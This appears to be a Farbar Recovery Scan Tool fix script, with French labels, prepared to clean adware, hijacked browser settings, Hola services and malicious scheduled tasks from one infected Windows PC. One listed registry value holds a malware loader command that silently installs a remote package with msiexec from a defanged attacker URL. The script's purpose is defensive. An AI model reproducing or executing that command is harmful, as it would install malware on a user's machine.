start::
CreateRestorePoint:
CloseProcesses:
ShellExecuteHooks: Pas de nom - {48F04F78-DE45-11E6-8A81-64006A5CFC23} - -> Pas de fichier
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [background_fault] => C:\Users\Home\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [Windscribe] => C:\Program Files (x86)\Windscribe\Windscribe.exe [10097840 2018-09-07] (Windscribe Limited)
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1487674635&z=6e6741e9706c0ec6639ca52gczebfm2q0m4z1qec2m&from=ggg0221&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} [Pays - ]
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491060427&z=9dfa5c08a0af8acad23e590gazbtcg1efqaeez0c5e&from=che0812&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE [Pays US - 69.16.231.56]
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1487674635&z=6e6741e9706c0ec6639ca52gczebfm2q0m4z1qec2m&from=ggg0221&uid=ST1000NM0011_Z1N2S8XEXXXXZ1N2S8XE&q={searchTerms} [Pays - ]
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE [Pays US - 204.79.197.200]
SearchScopes: HKU\S-1-5-21-3527481349-2306919907-3425379913-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2018-07-19] (IObit)
FF Plugin: @microsoft.com/GENUINE -> disabled [Pas de fichier]
R2 SparkSvc; C:\Program Files (x86)\baidu\Baidu Browser\sparkservice.exe [96784 2017-08-16] (Baidu Inc.)
S3 SparkUpdater; C:\Program Files (x86)\Baidu\SparkUpdate\Sparkupdate.exe [1372472 2016-01-15] (Baidu.com, Inc.)
RemoveDirectory: C:\Program Files (x86)\baidu
S3 BprotectEx; pas de ImagePath
S3 expressvpnsplittunnel; pas de ImagePath
S1 hnvaornf; pas de ImagePath
S1 ktwmkzjb; pas de ImagePath
S1 p1170849579am; pas de ImagePath
S1 p1441342821am; pas de ImagePath
S1 p1479173690am; pas de ImagePath
S1 p1487674648am; pas de ImagePath
S1 p1487926957am; pas de ImagePath
S1 p1487927091am; pas de ImagePath
S1 p1487927226am; pas de ImagePath
S1 p1487950865am; pas de ImagePath
S1 p1488208420am; pas de ImagePath
S1 p1488208516am; pas de ImagePath
S1 p1488288266am; pas de ImagePath
S1 p1488379278am; pas de ImagePath
S1 p1488379420am; pas de ImagePath
S1 p1488885334am; pas de ImagePath
S1 p1488885610am; pas de ImagePath
S1 p1489047223am; pas de ImagePath
S1 p1489047372am; pas de ImagePath
S1 p1490185907am; pas de ImagePath
S1 p1490185997am; pas de ImagePath
S1 p1490186046am; pas de ImagePath
S1 p1490186089am; pas de ImagePath
S1 p1490264007am; pas de ImagePath
S1 p1490264137am; pas de ImagePath
S1 p1490358229am; pas de ImagePath
S1 p1490793491am; pas de ImagePath
S1 p1490949514am; pas de ImagePath
S1 p1490949639am; pas de ImagePath
S1 p1745096627am; pas de ImagePath
S1 p1829733048am; pas de ImagePath
S1 p1894806702am; pas de ImagePath
S1 p2542029531am; pas de ImagePath
S1 p2957118427am; pas de ImagePath
S1 p3518639370am; pas de ImagePath
S1 p3623517036am; pas de ImagePath
S1 p3676623125am; pas de ImagePath
S1 p4207388602am; pas de ImagePath
S1 p4243700627am; pas de ImagePath
S1 p744739277am; pas de ImagePath
S3 PCFApiUtil; pas de ImagePath
S1 SRepairDrv; pas de ImagePath
S1 TSDefenseBt; pas de ImagePath
U3 aswbdisk; pas de ImagePath
U2 CWASRE; pas de ImagePath
U2 snare; pas de ImagePath
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
C:\Program Files\Hola\app\hola.exe
C:\Users\Home\AppData\Local\background_fault\aswRD.exe
Task: {665CAC13-0BD9-430C-A63B-D95CF21CE13F} - \Chetyphucty Schedule -> Pas de fichier <==== ATTENTION
FirewallRules: [{E898A386-15DE-4B98-B007-1066C2A4BB6D}] => (Allow) C:\Users\Home\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{C87D0BF9-B8C6-4BE2-AAE7-CD359B5774DE}] => (Allow) C:\Users\Home\AppData\Roaming\BitTorrent\BitTorrent.exe
HKLM\...\Run: [hola] => C:\Program Files\Hola\app\hola.exe [2171304 2018-06-05] (Hola Networks Ltd.) <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [background_fault] => C:\Users\Home\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Run: [Windscribe] => C:\Program Files (x86)\Windscribe\Windscribe.exe [10097840 2018-09-07] (Windscribe Limited)
HKU\S-1-5-21-3527481349-2306919907-3425379913-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj81RjMyFUE8Ndq4FdVQFdHyNdZQNYY5NYF5NYYcNkZWOH== /q <==== ATTENTION [Pays US - 104.28.16.238]
CHR Profile: C:\Users\Home\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2 [2018-10-11] <==== ATTENTION
R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [Fichier non signé] <==== ATTENTION
S2 hola_svc; C:\Program Files\Hola\app\hola_svc.exe [20538792 2018-06-05] (Hola Networks Ltd.) <==== ATTENTION
S2 hola_updater; C:\Program Files\Hola\app\hola_updater.exe [20137056 2017-12-24] (Hola Networks Ltd.) <==== ATTENTION
RemoveDirectory: C:\Program Files\Hola
Task: {5B03C774-0CFA-47E4-A261-60DB61F56BFC} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files (x86)\BikaQRss\BikaQ.exe [2017-02-23] (IEC) <==== ATTENTION
Task: {665CAC13-0BD9-430C-A63B-D95CF21CE13F} - \Chetyphucty Schedule -> Pas de fichier <==== ATTENTION
Task: {781E86F8-E5B4-454D-9516-B65C99669F18} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {9FDAE52F-8262-4C05-A6DD-5412F9A98107} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATTENTION
WMI_ActiveScriptEventConsumer_ASEC: <==== ATTENTION
Hosts:
EmptyTemp:
end::